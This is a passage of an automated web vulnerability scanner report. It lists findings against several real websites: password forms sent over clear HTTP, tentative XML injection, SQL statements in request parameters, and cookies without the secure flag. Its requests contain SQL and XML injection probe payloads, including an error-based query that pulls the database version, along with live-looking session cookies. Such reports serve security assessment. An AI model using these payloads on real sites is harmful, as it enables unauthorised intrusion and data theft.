Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
       <form method="post" action="/a-logon/" name="login">
           <input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............&nbsp;<input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...

8.8. http://pretty.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<td>
        <form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<input type="text" name="auid" id="auid" size="10">
            ............ <input type="password" size="10" name="password" id="password">
            <input type="submit" value=".........." class="button">
...[SNIP]...

8.9. http://vkontakte.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vkontakte.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...

8.10. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...

9. XML injection  previous  next
There are 4 instances of this issue:


9.1. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:22:36 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.44.124
X-Cnection: close
Date: Mon, 25 Apr 2011 15:20:36 GMT
Content-Length: 773

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

9.2. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps]]>>/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:37 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1987947190
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

9.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4]]>>/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:50 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1698422522
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

9.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://l-files.livejournal.net
Path:   /userapps/4/image

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4/image]]>>?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:06:06 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 610014231
Age: 0
Via: 1.1 varnish
Content-Length: 367
Connection: keep-alive


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

10. SQL statement in request parameter  previous  next
There are 8 instances of this issue:


10.1. https://checkout.netsuite.com/core/media/media.nl  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /core/media/media.nl

Request

GET /core/media/media.nl?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&c=NLCORP&h=65bae699770c58b12c10 HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 14:28:11 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700483469:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 1983

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82
...[SNIP]...

10.2. https://checkout.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /core/styles/pagestyles.nl

Request

GET /core/styles/pagestyles.nl?ct=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=pbWBN1GZpsFMMPGgD9fLtR1NsNxGljmTjF8P6kCVL9tLVKlFGB6qxvrttG2GmQHnFDK4npSP202Q0Q5SDBy6smMPTW80GnM5p2KvFCT1Xnpb36YTfw4s4JZlBHvMLJsr!1726784262; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:09 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:09 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:09 GMT
NS_RTIMER_COMPOSITE: 777140821:616363742D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69389

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

10.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://checkout.netsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 791381320:616363742D6A6176613034382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2p9QN1GJ2Z3S12xNCxQXlL1Sv9knyGTvcHGHKQhgRRLQvyzhppkLn91h0g3vBgYBjvYSZNXQykRX2kdnyQtQ3vxTgnKhjWyvZHZrDRvvmfT79J0vzSz4Lp1DGswvblyw!-1046013267; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

10.4. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://checkout.netsuite.com
Path:   /s.nl

Request

GET /s.nl?c=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&sc=4&whence=3&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Location: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 339

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://checkout.netsuite.com/page
...[SNIP]...

10.5. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Cookie: ASPSESSIONIDSSRCBTSB=CEAKPIJCCMCNNEOHIFEHAOEN; KTMDWestLB=1211368202.20736.0000; ASPSESSIONIDSSRADQTB=BCMNMKJCKPMBDHCEEMCKNLDG; Emp=datpwx=&UN=u662%3A%2F%2F0r652n4xr4%2Ep1z%2F0&SkipSSL=&PT=&CNAME=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 201

image1=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&txtPassword=3&txtUsername=Smith

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Content-Length: 3924
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=fzv6u&SkipSSL=&PT=&CNAME=UnicruEmployer&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&CID=&MultipleLocation=&RowsPerPage=&EUID=; path=/
Cache-control: private


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

10.6. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Request

GET /hmc/report/?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

10.7. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

10.8. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...

11. SSL cookie without secure flag set  previous  next
There are 27 instances of this issue:


11.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
